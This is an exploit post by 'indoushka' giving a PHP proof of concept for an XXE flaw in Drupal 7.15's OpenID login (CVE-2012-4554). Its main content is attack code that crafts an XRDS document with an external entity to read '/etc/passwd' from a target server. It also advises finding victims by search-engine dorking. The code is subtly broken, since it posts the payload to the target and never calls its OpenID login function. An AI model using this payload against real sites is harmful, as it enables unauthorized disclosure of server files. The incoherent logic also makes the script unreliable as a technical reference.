=============================================================================================================================================
| # Title     : Drupal 7.15 via OpenID XXE vulnerability                                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://new.drupal.org/home                                                                                                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: XXE vulnerability in Drupal via OpenID

   (Related : https://packetstorm.news/files/id/180671/ Linked CVE numbers: CVE-2012-4554 ) .
	
[+] save code as poc.php.

[+] Set target : line 66

[+] PayLoad :

<?php

/**
 * استغلال ثغرة XXE في دروبال عبر OpenID
 */

function send_openid_auth($target_uri, $identifier) {
    $url = rtrim($target_uri, '/') . "/?q=node&destination=node";
    
    $post_data = http_build_query([
        "openid_identifier" => $identifier,
        "name" => "",
        "pass" => "",
        "form_id" => "user_login_block",
        "op" => "Log in"
    ]);
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    return $response;
}

function generate_xrds($file_path) {
    // تصحيح المتغيرات بتحديد قيم صحيحة
    $xrds_ns = "xri://example.com/xrds";
    $xrd_ns = "xri://example.com/xrd";
    $v = "2.0";

    $xml = "<?xml version='1.0' encoding='UTF-8'?>";
    $xml .= "<!DOCTYPE foo [ <!ELEMENT URI ANY> <!ENTITY xxe SYSTEM 'file://$file_path'> ]>";
    $xml .= "<xrds:XRDS xmlns:xrds='$xrds_ns' xmlns='$xrd_ns*($v)' xmlns:openid='http://openid.net/xmlns/1.0'>";
    $xml .= "<XRD><Service><Type>http://specs.openid.net/auth/2.0/signon</Type>";
    $xml .= "<URI>&xxe;</URI></Service></XRD></xrds:XRDS>";
    
    return $xml;
}

function exploit_xxe($target_uri, $file_path) {
    $xrds_data = generate_xrds($file_path);
    $xrds_url = rtrim($target_uri, '/') . "/malicious.xrds";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $xrds_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $xrds_data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/xrds+xml']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (strpos($response, "<URI>") !== false) {
        preg_match('/<URI>(.*?)<\/URI>/', $response, $matches);
        return isset($matches[1]) ? $matches[1] : "File content not found.";
    }
    return "Exploit failed or file not readable.";
}

$target = "http://example.com/drupal";
$file_to_read = "/etc/passwd";
$result = exploit_xxe($target, $file_to_read);
echo "Extracted File Content:\n" . $result;





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================